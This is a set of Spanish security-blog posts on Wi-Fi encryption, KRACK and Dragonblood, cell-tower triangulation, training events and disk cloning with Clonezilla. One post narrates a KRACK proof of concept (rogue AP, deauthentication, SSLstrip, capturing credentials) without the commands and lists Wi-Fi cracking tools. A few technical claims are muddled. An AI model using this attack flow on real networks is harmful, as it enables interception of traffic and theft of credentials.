Actualmente se ha producido un incremento del despliegue de redes Wifi, no obstante, existe un desconocimiento casi masivo de los problemas que afectan a este tipo de infraestructuras y de las posibles consecuencias de los mismos. Esta red inalámbrica ofrece las comodidades y funcionalidades de las redes LAN tradicionales, sin embargo, las redes Wifi son víctimas de innumerables ataques producto de las vulnerabilidades. Mediante un Router inalámbrico o Access Point (AP) somos capases de conectarnos a internet y realizar diversas acciones, mantener contacto con familia, amigos, colegas, hacer compras online, transacciones bancarias, compartir documentos, trabajar desde la oficina o casa. etc.

Son muchos datos que viajan a través de la red y en su mayoría datos sensibles, por lo que tenemos que tener protegida adecuadamente nuestra red inalámbrica, a continuación, a manera de conocimiento previo veremos un poco de la historia de esta tecnología.

HISTORIA 



Esta tecnología contemporánea surgió por la necesidad de establecer un mecanismo de conexión inalámbrica que fuese compatible entre distintos dispositivos. Fue en busca de esa compatibilidad que en 1999 las empresas 3COM, Airones, Intersil, Lucent Technologies, Nokia y Symbol Technologies se reunieron para crear la Wireless Ethernet Compatibility Alliance WECA, actualmente llamada Wi-Fi Alliance. El objetivo de la misma fue designar una marca que permitiese fomentar la tecnología inalámbrica y asegurar la compatibilidad entre equipos. De esta forma, en abril del 2000 WECA certifica la interoperabilidad de equipos según la norma IEEE 802.11b, bajo la marca Wi-Fi. Esto quiere decir que el usuario tiene la garantía de que todos los equipos que tengan el sello Wi-Fi pueden trabajar juntos sin problemas, independientemente del fabricante de cada uno de ellos. Se puede obtener un listado completo de equipos que tienen la certificación Wifi en Alliance - Certified Products. En el año 2002 la asociación WECA estaba formada ya por casi 150 miembros en su totalidad. La familia de estándares 802.11 ha ido evolucionando desde su creación, mejorando el rango y velocidad de la transferencia de información, entre otras cosas.


La norma IEEE 802.11 fue diseñada para sustituir el equivalente a las capas físicas y MAC de la norma 802.3 (Ethernet). Esto quiere decir que en lo único que se diferencia una red Wifi de una red Ethernet es en cómo se transmiten las tramas o paquetes de datos. Por tanto, una red local inalámbrica 802.11 es completamente compatible con todos los servicios de las redes locales (LAN) de cable 802.3 (Ethernet).
SOBRE EL NOMBRE WI-FI
 
Aunque se tiende a creer que el término Wifi es una abreviatura de Wireless Fidelity (Fidelidad inalámbrica), equivalente a Hi-Fi, High Fidelity (Alta fidelidad), término frecuente en la grabación de sonido, la WECA contrató a una empresa de

publicidad para que le diera un nombre a su estándar, de tal manera que fuera fácil de identificar y recordar.

Phil Belanger, miembro fundador de Wi-Fi Alliance que apoyó el nombre Wi-Fi escribió:

"Wi-Fi" y el "Style logo" del Ying Yang fueron inventados por la agencia Interbrand. Nosotros (WiFi Alliance) contratamos a Interbrand para que nos hiciera un logotipo y un nombre que fuera corto, tuviera mercado y fuera fácil de recordar. Necesitábamos algo que fuera algo más llamativo que “IEEE 802.11b de Secuencia Directa”. Interbrand creó nombres como “Prozac”, “Compaq”, “OneWorld”, “Imation”, por mencionar algunos. Incluso inventaron un nombre para la compañía: VIATO.”

ESTÁNDARES QUE CERTIFICA WI-FI

Existen diversos tipos de Wifi, basado cada uno de ellos en un estándar IEEE 802.11 aprobado. Son los siguientes:
  • Los estándares IEEE 802.11b, IEEE 802.11g e IEEE 802.11n disfrutan de una aceptación internacional debido a que la banda de 2.4 GHz está disponible casi universalmente, con una velocidad de hasta 11 Mbps, 54 Mbps y 300 Mbps, respectivamente.
  • En la actualidad ya se maneja también el estándar IEEE 802.11a, conocido como WIFI 5, que opera en la banda de 5 GHz y que disfruta de una operatividad con canales relativamente limpios. La banda de 5 GHz ha sido recientemente habilitada y, además, no existen otras tecnologías (Bluetooth, microondas, ZigBee, WUSB) que la estén utilizando, por lo tanto, existen muy pocas interferencias. Su alcance es algo menor que el de los estándares que trabajan a 2.4 GHz (aproximadamente un 10%), debido a que la frecuencia es mayor (a mayor frecuencia, menor alcance).
  • Existe un primer borrador del estándar IEEE 802.11n que trabaja a 2.4 GHz y a una velocidad de 108 Mbps. Sin embargo, el estándar 802.11g es capaz de alcanzar ya transferencias a 108 Mbps, gracias a diversas técnicas de aceleramiento. Actualmente existen ciertos dispositivos que permiten utilizar esta tecnología, denominados Pre-N. 
Existen otras tecnologías inalámbricas como Bluetooth que también funcionan a una frecuencia de 2.4 GHz, por lo que puede presentar interferencias con Wifi. Debido a esto, en la versión 1.2 del estándar Bluetooth por ejemplo se actualizó su especificación para que no existieran interferencias con la utilización simultánea de ambas tecnologías, además, se necesita tener 40.000 k de velocidad.

Wi-Fi Alliance:«Alianza Wi-Fi», es una organización que promueve la tecnología Wifi y certifica los productos Wifi, si se ajustan a ciertas normas de interoperabilidad.

Recientemente Wifi Alliance ha cambiado el nombre de la nomenclatura de las redes inalámbricas:
  • Wifi 4 = 802.11n
  • Wifi 5 = 802.11ac
  • Wifi 6 = 802.11ax
ESTÁNDAR DE CIFRADO

WEP: (Wired Equivalent Privacy), «Privacidad equivalente a cableado», es el sistema de cifrado incluido en el estándar IEEE 802.11 como protocolo para redes wireless que permite cifrar la información que se transmite. El sistema WEP fue pensado para proporcionar una confidencialidad comparable a la de una red tradicional cableada, pero resultó ser vulnerable y se puede romper con un ataque de diccionario.

WPA: (Wi-Fi Protected Access), «Acceso Wi-Fi protegido», creado para corregir las deficiencias del sistema previo WEP. ​Tiene un componente WPA-PSK (TKIP), es la implementación del Protocolo de Integridad de Clave Temporal (TKIP - Temporal Key Integrity Protocol), que cambia claves dinámicamente a medida que el sistema es utilizado pero de igual manera se hace vulnerable ante un ataque de recuperación de keystream, esto es posible al reinyectar tráfico en una red que utilizara WPA TKIP. Esto es posible por diversas causas, algunas de ellas heredadas de WEP.

WPA2: (Wi-Fi Protected Access 2), «Acceso Wi-Fi protegido 2», creado para corregir las deficiencias del sistema previo en el nuevo estándar 802.11i. WPA, por ser una versión previa, que se podría considerar de "migración", no incluye todas las características del IEEE 802.11i, mientras que WPA2 se puede inferir que es la versión certificada del estándar 802.11i. Tiene un cifrado con una clave de 128bits, este estándar es el que actualmente tenemos en la mayoría de los Access Point.

Pero surge la pregunta: ¿Esta realmente protegida nuestra red wifi con el WPA2?
Hace unos años salió un nuevo ataque a WPA2 con el nombre de KRACK (Key Reinstallation Attacks), con la cual es posible romper el cifrado de WPA2, ingresar a la red wifi y colocar un sniffer (Wireshark).
WPA3: (Wi-Fi Protected Access 3), «Acceso Wi-Fi protegido 3», es el sucesor de WPA2​ que fue anunciado en 2018, por la Wi-Fi Alliance. El nuevo estándar utiliza cifrado de 128 bits en modo WPA3-Personal (192 bits en WPA3-Enterprise) y confidencialidad de reenvío. El estándar WPA3 también reemplaza el intercambio de claves pre-compartidas con la autenticación simultánea de iguales, lo que resulta en un intercambio inicial de claves más seguro en modo personal.​ La Wi-Fi Alliance también afirmó que WPA3 reduciría los problemas de seguridad que plantean las contraseñas débiles y simplificará el proceso de configuración de dispositivos sin interfaz de visualización.

Pero surge otra pregunta:¿Realmente reduce los problemas de seguridad WPA3?

El protocolo WPA3 intento abordar las deficiencias técnicas del protocolo WPA2, que se convirtió en inseguro y vulnerable a ataques KRACK, en el caso de WPA3 se descubrió la vulnerabilidad denominada Dragonblood (Sangre de dragón), tiene un impacto directo en el último protocolo de seguridad y autenticación. 

*Protocolos con riesgo medio (no recomendables) * 

WPA-PSK (TKIP): En esencia es básicamente el cifrado estándar WPA o WPA1, que ya ha sido ampliamente superado y no es seguro. 

WPA-PSK (AES): Elige el protocolo inalámbrico WPA con el cifrado más moderno AES. Los dispositivos que soportan AES casi siempre soportarán WPA2, mientras que los dispositivos que requieran WPA1 casi nunca admitirán el cifrado AES, por lo que es un sin sentido que añadimos más que nada como curiosidad.
WPA2-PSK (TKIP): Utiliza el estándar WPA2 con cifrado TKIP. Como vimos esta opción no es segura, pero si tenemos dispositivos antiguos que no soportan una red WPA2-PSK (AES) es necesario para poder seguir utilizándolos.

*Protocolo con riesgo mínimo (recomendado) * 

WPA2-PSK (AES): La opción más segura que utiliza WPA2, el último estándar de encriptación Wifi, y el más reciente protocolo de encriptación AES. Lo reitero, salvo por razones de fuerza mayor debería ser nuestra mejor opción.

WPA3 (Forward Secrecy): Esta sería una buena opción, WPA3 utiliza el protocolo de enlace SAE (Autenticación simultánea de iguales), esta característica de seguridad evitaría que los atacantes descifren el tráfico antiguo capturado, incluso si alguna vez consiguen la contraseña de la red.

SEGURIDAD EN WIFI

En la actualidad uno de los principales y problemas que enfrenta esta tecnología es la seguridad ya que su implementación es simple y la mayoría de las redes inalámbricas son instaladas por administradores de redes y/o sistemas sin tomar en cuenta la seguridad como factor clave. Por consiguiente, convierten dichas redes en abiertas, sin proteger la información que por ellas circula. Existen distintas alternativas para implementar la seguridad de estas redes, las más comunes son la utilización de protocolos de encriptación de datos para los estándares ya mencionados, estos se encargan de codificar la información transmitida para proteger su confidencialidad, proporcionados por los propios dispositivos inalámbricos, o IPSEC (túneles IP) en el caso de las VPN y el conjunto de estándares IEEE 802.1X, que permite la autenticación y autorización de usuarios.

En esta parte no nos adentraremos en las técnicas de hacking Wifi, por otra parte, más bien nos centraremos en la seguridad ya que este articulo está abocado a la seguridad en redes Wifi. Pero el primer paso para asegurar una red Wifi, es conocer cuáles son los ataques que este tipo de redes pueden sufrir. Éstos pueden ser divididos en dos grandes grupos:
Ataques Pasivos: El principal objetivo del atacante es obtener información. Estos ataques suponen un primer paso para ataques posteriores. Algunos ejemplos de este tipo de ataques serían el espionaje, escuchas, wardriving y los ataques para el descubrimiento de contraseñas.
Ataques Activos: Estos ataques implican la modificación en el flujo de datos o la creación de falsos flujos en la transmisión de datos. Pueden tener dos objetivos diferentes: pretender ser alguien que en realidad no se es o colapsar los servicios que puede prestar la red. Algunos ejemplos de este tipo de ataques son el spoofing, la instalación de puntos de acceso no autorizados o Rogue APs, el ataque de Hombre en el medio (Man In The Middle), el secuestro de sesiones (Hijacking) y la denegación de servicio (DOS).

Atreves de una conexión Wifi con el cifrado estándar WPA2, como ya habíamos visto que actualmente sería menos insegura, surge las preguntas: ¿pueden averiguar mi contraseña y usar mi red Wifi ilegítimamente?

¿Cuál son las mitigaciones para ello?

En este caso hay una posibilidad, existe una vulnerabilidad encontrada al cifrado WPA2 por Mathy Vanhoef de imec-DistriNet (KRACK), Las debilidades están en el estándar de Wifi. El problema es que, a partir de esta vulnerabilidad, alguien podría interceptar, escuchar e incluso modificar el tráfico de un dispositivo dentro de una red Wifi, violando completamente la privacidad del usuario. Esto hace que la vulnerabilidad sea crítica.

¿Cómo funciona el ataque?

Cuando un dispositivo se conecta a una red Wifi con WPA2, el primer paso para la comunicación consiste en negociar con el router una llave que se utilizará para cifrar el tráfico enviado entre ellos. Esta llave no es la clave de la red Wifi, sino una aleatoria, que se negocia para cada sesión. Para acordar esta llave de cifrado, los dispositivos realizan lo que se conoce como “4 way handshake”, o saludo de 4 vías, en el cual confirman mediante cuatro mensajes que ambos tienen la clave de cifrado y la comunicación puede realizarse. En el tercer mensaje de esta comunicación, el router envía la llave con la que será cifrada la sesión, y en el cuarto mensaje el dispositivo confirma que la recibió correctamente. Si se produce un corte en la comunicación, y el router no recibe el cuarto mensaje de confirmación, continúa mandando la llave hasta que reciba respuesta. El dispositivo, por su parte, cada vez que recibe una llave la instala para luego utilizarla.

El problema es que el protocolo WPA2 no verifica que la clave sea diferente a las que ya se utilizaron, por lo que la misma llave puede utilizarse más de una vez, y es aquí donde está la vulnerabilidad. Mediante un ataque Man In The Middle, se puede manipular el tercer mensaje del handshake, forzando al dispositivo a instalar la llave enviada por el atacante. A partir de esta llave, el atacante puede entonces descifrar el tráfico que envía el dispositivo. Lo primero que debemos entender es que la vulnerabilidad no está en la clave de la red Wifi, ni en el router o cualquier otro dispositivo, sino en el protocolo WPA2, es decir, en la forma en que se establece la comunicación. Es por esto que afecta a las redes Wifi que lo utilizan. El ataque se lleva a cabo en el momento en que un dispositivo se conecta al router (Access Point) y se produce el 4-way handshake para establecer la sesión. De todas formas, se pueden utilizar otros ataques para lograr interrumpir esa sesión y que el dispositivo deba volver a conectarse.

Por otro lado, esta vulnerabilidad afecta directamente la comunicación entre el dispositivo y el router, por lo que un atacante debe tener acceso físico a la señal de la red Wifi para poder realizar el ataque, lo cual disminuye bastante la superficie de acción. Además, el atacante no puede obtener mediante este ataque la clave de nuestra red Wifi, por lo que tampoco puede hacer uso de la red ni conectarse directamente a ella. Sin embargo, lo que sí puede hacer es interceptar y leer el tráfico que envía un dispositivo e incluso manipular este tráfico. Es decir, que además de violar completamente la privacidad, puede realizar otros ataques, como insertar códigos maliciosos, manipular los DNS o utilizar otras técnicas combinadas con ataques de Man In The Middle. Frente a esta vulnerabilidad, las protecciones más habituales no son eficaces. Si bien es una buena práctica cambiar la clave de la red Wifi por una fuerte y extensa; en este caso no nos servirá de mucho, ya que el atacante no obtiene la contraseña para conectarse a la red, sino la llave con la que se cifra la sesión del dispositivo. Tampoco funcionan otras protecciones como los filtros por dirección MAC, que son fáciles de evadir con técnicas de MAC Spoofing; ni esconder el nombre de la red, ya que muchas aplicaciones actualmente pueden encontrar SSIDs ocultos.

Ni siquiera el mecanismo de conexión WPS está exento, ya que también implementa el mismo 4-way handshake que es vulnerable. Por último, volver a utilizar protocolos anteriores como WPA o WEP ni siquiera debe considerarse una opción, ya que los mismos son incluso más fácilmente vulnerables que WPA2.

¿Qué es lo que podemos hacer?

Para evitar el ataque, los usuarios deben actualizar los productos afectados tan pronto como las actualizaciones de seguridad estén disponibles. Tengamos en cuenta que, si su dispositivo es compatible con Wifi, lo más probable es que se vea afectado. La mayoría de los proveedores actualizan correctamente sus productos, en ciertos casos los ataques aún son posibles.

¿De qué manera podemos mitigar el problema en estos casos?

En primera instancia, lo mejor es utilizar conexiones cifradas. Lo primero que se nos viene a la mente es navegar por páginas que sean seguras, es decir que utilicen el protocolo HTTPS. Sin embargo, no todas las páginas utilizan este protocolo, e incluso si está mal implementado puede ser vulnerado e interceptado. Inclusive la vulnerabilidad KRACK puede interceptar el tráfico HTTPS de un sitio que lo implementa incorrectamente. Por lo tanto, no está de más que te tomemos el trabajo de verificar siempre el certificado de seguridad de aquellos sitios que te pidan información importante, además de prestar atención a dónde navegas e introduces tus datos. Para agregar una capa más de seguridad, lo más recomendable es utilizar una conexión VPN. De esta forma nos aseguramos de cifrar el tráfico desde y hacia nuestro dispositivo, tal como lo haríamos en una red pública o no segura. Dado que este ataque afecta directamente el 4-way handshake que realizan los clientes al conectarse a la red Wifi, el principal objetivo son los dispositivos conectados y no los routers o Access Point. Por lo que, si el firmware de tu router no puede ser aún actualizado, te recomendamos que deshabilites las funciones de cliente (habitualmente utilizadas en el modo repetidor) y la versión del protocolo 802.11r (o fast roaming), para no correr riesgos innecesarios. Por último, un atacante podría utilizar esta vulnerabilidad para introducir códigos maliciosos o engañar al usuario, por lo que no olvides tener instaladas y actualizadas las herramientas de seguridad y antimalware en tus dispositivos. Después de todo la buena noticia es que la mayoría de los proveedores ya distribuyeron nuevas actualizaciones para evitar ataques, y que el impacto de la reproducción de cuadros de difusión y multidifusión es bajo en la práctica. Por lo tanto, la mayoría de los usuarios no deben preocuparse, simplemente hay que seguir las buenas prácticas de seguridad de los AP y mantener los dispositivos actualizados.

Ahora bien, la conexión Wifi con el cifrado estándar WPA3, la cual sería la última actualmente, promete mayor seguridad, surge la pregunta: ¿Este último estándar es vulnerable?  
los investigadores Mathy Vanhoef y Eyal Ronen dieron a conocer la existencia de dos vulnerabilidades, denominadas Dragonblood, que tienen un impacto directo en el último protocolo de seguridad y autenticación lanzado por la Wi-Fi Alliance. De ser explotadas, permitirían a un atacante obtener la contraseña de una red Wi-Fi por fuerza bruta e ingresar a la red.
El primer fallo, CVE-2019-13377, afecta al handshake (que es un apretón de manos) Dragonfly de WPA3 cuando se usan curvas Brainpool para el cifrado. Dragonfly es el mecanismo de autenticación entre el usuario y el punto de acceso se conoce como Simultaneous Authentication of Equals (SAE). Inicialmente, la Wi-Fi Alliance usó curvas elípticas P521 para el cifrado. Sin embargo, los investigadores descubrieron una serie de errores de diseño distintos en WPA3 que pueden dividirse en dos categorías, los que permite realizar ataques de downgrade y los que permite filtraciones de canal lateral Brainpool.

En el caso de los ataques de downgrade, un hacker malicioso puede realizar un ataque dirigido a un dispositivo que permita el protocolo WPA3 y lograr llevarlo al handshake del protocolo anterior (WPA2), y así obtener el hash de la contraseña con técnicas tradicionales y anteriormente utilizadas.

Este tipo de ataques de downgrade no son nuevos. En 2014 se publicó sobre la vulnerabilidad conocida como Poodle en el protocolo de comunicación seguro SSL 3.0, que fue el protocolo previo a TLS. Esta vulnerabilidad lo que hacía era aprovecharse de una característica que hace que, cuando un intento de conexión segura falla, se proceda a intentar realizar de nuevo esa conexión, pero con un protocolo de comunicación más antiguo. De esa forma, un atacante podría ocasionar intencionadamente errores de conexión en protocolos seguros y forzar así el uso de SSL 3.0 para aprovechar la nueva vulnerabilidad.

En el caso de las filtraciones de canal lateral, las redes que soportan el protocolo WPA3 pueden engañar a los dispositivos para que utilicen algoritmos más débiles que filtren pequeñas cantidades de información sobre la contraseña de la red, con lo cual si se realizan de manera repetida podría llegar a obtener la contraseña completa. Los investigadores publicaron en GitHub cuatro herramientas que sirven para analizar algunas de las vulnerabilidades descubiertas en el protocolo, llamadas Dragonslayer, Dragondrain, Dragontime, y Dragonforce.
Cabe resaltar que el protocolo WPA3 está en una etapa temprana de implementación y que aún son pocos los dispositivos que lo utilizan, por lo que el descubrimiento permitirá realizar mejoras que los próximos dispositivos que salgan al mercado ya tendrán incorporadas. Actualmente, la mayoría de las redes Wi-Fi continúan utilizando WPA2 para proteger la transferencia de datos.

AUTOR: David F. Suárez (Ethical Pentester)

SEGURIDAD EN REDES WIFI - PARTE 2/2

$
0
0

En la anterior entrada hablamos un poco sobre los conceptos necesarios sobre la tecnología Wireless, haciendo mención de historia, estándares, vulnerabilidades, buenas prácticas y herramientas de hacking y test de penetración. 


En esta ocasión, realizaremos una prueba de concepto sobre el ataque KRACK.


FUNCIONAMIENTO DE KRACK

A continuación, como prueba de concepto presentamos los pasos para realizar un ataque KRACK. Tenemos un dispositivo Android conectado a una red Wi-Fi con WPA2 llamada testnetwork:

Una vez descargado el script en Python y se tiene que capturar con airodump el BSSID del dispositivo Android como nuestro objetivo, corremos el siguiente comando:

Una vez corra el script, detectará que el Access Point (Target network) está en el canal 6:
A continuación, pasa a crearse un Access Point falso en un canal diferente:
Luego desde otra pestaña de la consola se ejecuta el siguiente comando, para que se configure el nuevo Access Point falso:
Adicionalmente se ejecuta también SSLSTRIP para eliminar la protección adicional de HTTPS de un sitio mal configurado:
El sitio con el que se hace la prueba es:
También se inicia Wireshark para capturar el tráfico del nuevo Access Point falso:
Luego en la primera pestaña de la consola, se puede ver que se realizó la inyección CSA (Proporciona un mecanismo para que un AP notifique a los dispositivos conectados su intención de cambio de canal). Vemos también la disociación inyectada, para desconectar al dispositivo Android.
Dispositivo Android desconectado:
A continuación, el dispositivo Android se conecta nuevamente, pero esta vez al Access Point falso, teniendo así una posición de MitM establecida:
También vemos que está preparado realizar un ataque de reinstalación de claves (KRACK):
Una vez esté conectado el dispositivo Android al Access Point falso, se hace la prueba de captura de tráfico y credenciales colocadas desde el dispositivo Android en un sitio mal configurado que SSLSTRIP claramente fue capaz de eliminar la protección adicional de HTTPS:
Se verifica en el Wireshark colocando el filtro HTTP:
Claramente vemos que se obtuvo las credenciales.

Buenas prácticas de seguridad

Cambiar la contraseña por defecto. - Un sistema de seguridad robusto deja de serlo si la contraseña es trivial o fácilmente identificable. Debemos establecer una clave de acceso a la red WiFi de al menos 12 caracteres con mayúsculas, minúsculas, números y símbolos.

Cambiar el nombre de SSID. -Normalmente el SSID o nombre de la red viene definido por defecto. Éste debe ser sustituido por uno que no sugiera cuál es nuestro operador y que no guarde relación con la contraseña de acceso a la red.

Elegir cifrado WPA2-PSK (AES). - Como ya se mencionó, este tipo de cifrado es el más seguro actualmente.

Modificar la contraseña para el panel de configuración. - Para acceder al panel de configuración necesitamos conocer la contraseña de acceso, que viene en la documentación de nuestro dispositivo. Suelen ser muy sencillas, como “admin” o “1234”. Conviene sustituirla para evitar que, si alguien logra conectarse, pueda configurar el router a su antojo.

Utilizar servidor RADIUS para autentificación por usuario (En el caso de empresas). - Del inglés «Remote Access Dial In User Service», es un protocolo que se destaca sobre todo por ofrecer un mecanismo de seguridad, flexibilidad, capacidad de expansión y una administración simplificada de las credenciales de acceso por usuarios a un Access Point.

Habilitar restricción de MAC. - Una de las características de seguridad que nos permiten los routers es la restricción del acceso a la red tan solo a aquellos equipos o dispositivos con una dirección MAC concreta. Como ya sabemos La MAC es el identificador único de cada dispositivo de red. Podemos averiguar en cada uno de ellos su MAC y añadirlo en el router como dispositivo seguro, impidiendo así el acceso de cualquier otro dispositivo no memorizado. Es decir, es posible configurar el router para que filtre por direcciones MAC, para que sólo los dispositivos que deseemos se conecten a nuestra red Wifi. Sin embargo, a día de hoy, con los conocimientos necesarios, es posible falsear esa dirección para ponerse una permitida. ¿Cómo? Mirando, por ejemplo, la dirección MAC que tienen los dispositivos conectados en un momento dado. Por tanto, aunque aplicar esta medida es bueno, no es una garantía de seguridad.

Implementación de WIPS (En el caso de empresas). – «Wireless Intrusión Prevention System», Es un sistema de prevención de intrusión inalámbrica, viene a ser un hardware de red que monitorea el espectro radioeléctrico para detectar la presencia de puntos de acceso no autorizados (Fake AP), trafico sospechoso y para tomar contramedidas (prevención de intrusos) automáticamente.

Adquirir un Router Access Point con certificación de WI-FI Alliance. – Como ya vimos, la WI-FI Alliance es la que se encargada de promover la tecnología Wifi, también de certificar los productos si estos cumplen con la interoperabilidad, seguridad, estándares y protocolos. Por este motivo es muy recomendable adquirir un producto certificado.
Herramientas de hacking Wifi y pentesting 

La siguiente lista es de algunas de las herramientas de hacking a redes Wifi:

1.-Aircrak-ng
2.-krack attacks
3.- Fern WiFi Wireless Cracker
4.-Kismet
5.- CoWPAtty
6.-AirJack
7.- Fluxión
8.- AirSnort
9.- WiFi WPS WPA Tester
10.-InSSDe
11.- Wifislax (Sistema Operativo GNU/Linux basada en Slackware)

AUTOR: David F. Suárez (Ethical Pentester)

TRIANGULACIÓN DE TELEFONOS

$
0
0

El día de hoy vamos a explicar cómo el FBI puede rastrear cualquier número de teléfono móvil a una ubicación exacta en territorio de Estados Unidos. Este método se llama "búsqueda triangular" o "huella triangular", o simplemente "triangulación".

Esta forma de seguimiento requiere acceso directo a los sistemas del proveedor móvil, por lo que no es algo que está disponible para el hacker promedio. Sin embargo, puesto que muchos de ustedes podrían estar planeando unirse a la agencia responsable de la inteligencia de su país, podría serles de utilidad saber cómo funciona la triangulación!

Para entender mejor la triangulación, vamos a ver la forma de una torre celular. Tome en cuenta que tiene la forma de un triángulo:

Cada lado del triángulo se denomina sector. Estos sectores son etiquetados por las letras griegas alfa, beta, y gamma (a, ß, Y). Dentro de cada sector se puede ver la distancia a la que está conectado un telefono movil. Esto permite "rastrear" el teléfono detectando a qué sector está conectado, y la distancia a la que se encuentra. Aquí es una representación de estos sectores, con la torre de telefonía celular en el medio:

Ahora, supongamos que nuestro objetivo está conectado en el sector Gamma , y está en el rango número 4. así sabemos que el teléfono móvil está en algún lugar en el área marcada por el color amarillo:
Espero que se entiende la idea. Vamos a pasar a lo que ocurre cuando usamos 2 torres!

Cuando un teléfono celular está conectado a 2 torres que se superponen entre sí , al mismo tiempo, podemos aumentar aún más nuestra exactitud en la localización del teléfono. El teléfono está conectado a la torre azul en el sector Alfa y está en la banda 5 (5 millas) de distancia, mientras que también está conectado a la torre naranja en el sector gamma y está en la banda 4 (4 millas) de la torre naranja, podemos rastrear el teléfono celular realmente con precisión mediante la comparación de los resultados de las 2 torres, como se muestra a continuación:



Ahora, si una tercera torre se pone en juego, tenemos lo que se llama una "triangulación". En este caso, podemos rastrear el teléfono celular realmente con precisión! Vamos a ver lo que sucede cuando traemos una tercera torre en:

Como se puede ver, el teléfono se encontraría dentro del círculo rojo. Si se mueve hacia la izquierda, entra en la banda 6 de la torre verde, si se mueve a la derecha, entra en la banda 4 de la torre verde, Si se mueve hacia abajo, entra en el sector gamma de la torre verde y también entra en la banda 4 de la torre azul.

Sólo el gobierno o el proveedor de telefonía móvil podría llevar a cabo una triangulación, a menos que un alguien haya comprometido sus sistemas, por supuesto. Esta forma de trazado es muy fiable y se utiliza mucho por el FBI, no es necesario tener GPS o cualquier otra cosa por el estilo, sólo es necesario que el dispositivo se conecte a una antena de telefonía móvil.

La triangulación es casi siempre posible en las zonas urbanas, debido a que las torres están cerca una de la otra, pero es menos común en las zonas rurales, donde las torres están más separadas que en una ciudad.

Autor: Kelvin Security 
           RedBird


PRÓXIMOS EVENTOS "THE HACKING DAY - PROJECT" NOVIEMBRE 2019

$
0
0

El día de hoy queremos contarles un poco sobre los eventos que estaremos realizando en el mes de Noviembre, para que todos los interesados se animen y participen de ellos.


IV BootCamp de Hacking Etico - THD-EPC (Ethical Pentester Certified) 

Del 18 al 23 de Noviembre
Santagueda - Manizales
Centro Recreacional la Rochela

DESCRIPCIÓN: 


En el THD-EPC el asistente aprenderá como comprometer la seguridad de toda una organización utilizando las mismas técnicas, herramientas y metodología usada por atacantes reales, de la misma manera conociendo las posibles fallas en la protección de la información estará en capacidad de aplicar las contramedidas para contra restar estos ataques.

El training es un curso 90% práctico - 10% teórico, en donde el asistente será constantemente enfrentado a nuevos desafíos, con la guía del instructor.
A cada asistente se le proveerá una máquina virtual con Kali, una distribución de Linux diseñada para Penetration Testers, desde donde se realizarán la mayoría de los laboratorios. También se proveerá una placa Wireless para ser usada durante los laboratorios de Wireless Hacking.

THD - Firewall Open-Source Empresarial  

27 de Noviembre 
Camara de Comercio de Pereira 


8:00 AM - 6:00 PM

Pereira 

DESCRIPCIÓN:

El firewall supervisa todo el tráfico de red y tiene permisos para identificar y bloquear el tráfico no deseado. El hecho de que hoy en día la mayoría de equipos estén conectados a Internet facilita a los atacantes un sinfín de víctimas potenciales. Los atacantes sondean otros equipos conectados a Internet para determinar si son vulnerables a varias clases de ataques. Cuando detectan una víctima propicia, pueden franquear sus sistemas de seguridad e infiltrarse en ese equipo. Llegados a este punto, el atacante puede obligar al equipo a efectuar prácticamente cualquier tarea que quiera. Los atacantes suelen intentar apropiarse de información personal para cometer fraudes financieros. Toda esta actividad tiene lugar en segundo plano, sin que el usuario sea consciente de lo que sucede.

El curso se realiza con Implementación de un Cortafuegos a nivel Empresarial, se creará y administrara diferentes zonas con sus respectivas reglas para el control correcto de los paquetes que pasan hacia la WAN, LAN, DMZ o zona de Invitados. Se configurará servicios especiales como VPN, Filtro de Contenidos, Canal Redundante, Control de Ancho de Banda, entre otros.  

Para mas información visita nuestra pagina web:  www.thdsecurity.com 

FELIZ NAVIDAD Y PROSPERO AÑO NUEVO

$
0
0

Este 2019 ha sido un año cargado de muchos retos y aventuras en nuestro mundo de la ciberseguridad, un año en el que quedan muchas buenas experiencias por las cuales estar agradecido.

Desde el equipo TheHackingDay les queremos agradecer por pertenecer un año más a esta comunidad y el próximo año nos seguiremos viendo con más artículos, cursos y talleres.

Un caluroso abrazo y próspero 2020 para todos.

ADIÓS WINDOWS 7

$
0
0
Hoy 14 de Enero de 2020 finaliza oficialmente el soporte de Microsoft para el sistema operativo Windows 7 y se despiden con el siguiente mensaje “Aunque podrías seguir usando tu PC con Windows 7, sin actualizaciones continuas de software, esto supondrá un mayor riesgo frente a virus y malware.”

Este es un tema delicado desde el punto de vista de la ciberseguridad, y más aun teniendo en cuenta que a día de hoy el 32,74% de portátiles y sobremesas todavía ejecutan este sistema operativo, solo por detrás de Windows 10 con el 47,65%.

Muchos usuarios domésticos verán afectada su seguridad a falta de actualizaciones, pero aun peor es el caso en empresas e instituciones en donde la seguridad de la información es un tema delicado y que en caso de resultar una vulnerabilidad de nivel crítico en cuanto a seguridad y privacidad, Microsoft no lanzará parches para corregirlas.


De primera mano podemos decir que la gran mayoría de las empresas en las cuales realizamos auditorías de ciberseguridad durante el año 2019, contaban aún con una gran cantidad de equipos con Windows 7 y peor aún muchos de ellos sin parches de seguridad.

Así que entre las posibles soluciones que se tienen ante este suceso está la actualización a Windows 10 para quienes tienen equipos no muy viejos u optar por nuestro buen amigo LINUX.

@XzupaX
@TheHackingDay

 

CLONACIÓN DE DISCOS

$
0
0

En la actualidad es muy importante la clonación de discos duros para las empresas, ya sea para prevenir perdida de la información por daño de un equipo o secuestro digital o simplemente para realizar análisis forense.

Para realizar la copia de información existen muchos métodos, hoy vamos a ver uno muy útil, la clonación de discos bit a bit, este método es fundamental ya que no solo copia la información almacenada, también hace una clonación exacta de la configuración, particiones, programas y características establecidos en el disco de origen.



Para realizar la clonación de disco vamos a utilizar el software Clonezilla y se utilizaran tres memorias usb; una de las memorias se hará booteable y en ella se guardará la imagen iso de Clonezilla, la segunda memoria contendrá la información que se desea copiar y la tercer memoria será en donde se va a almacenar la información de la segunda memoria (para el ejemplo utilizamos memorias usb, pero el proceso con discos es el mismo).

Para descargar Clonezilla vamos a https://clonezilla.org/downloads.php. Allí encontraremos algunas versiones del software, para este ejemplo seleccionaremos la primer opción, basada en ubuntu.

Al seleccionar la versión del software, el sitio web nos redirige a otra página en la cual debemos seleccionar la arquitectura y el tipo de archivo que deseamos descargar (zip o iso), para este caso se seleccionó la arquitectura amd64 y el tipo de archivo imagen iso.
.

Luego de descargar el archivo, se debe copiar en un cd o una memoria usb. En este ejemplo se ha usado una memoria usb, la cual debe hacerse booteable.

Una vez se tiene la memoria booteable se debe conectar al equipo en el cual se va a realizar la clonación y este se debe iniciar desde la memoria usb para ejecutar el Clonezilla. En el primer pantallazo se selecciona la opción Clonezilla Live.

A continuación, el wizard nos va guiando paso a paso en el proceso, en la primer ventana nos pide que seleccionemos el idioma en el cual deseamos que nos muestre los datos en pantalla.

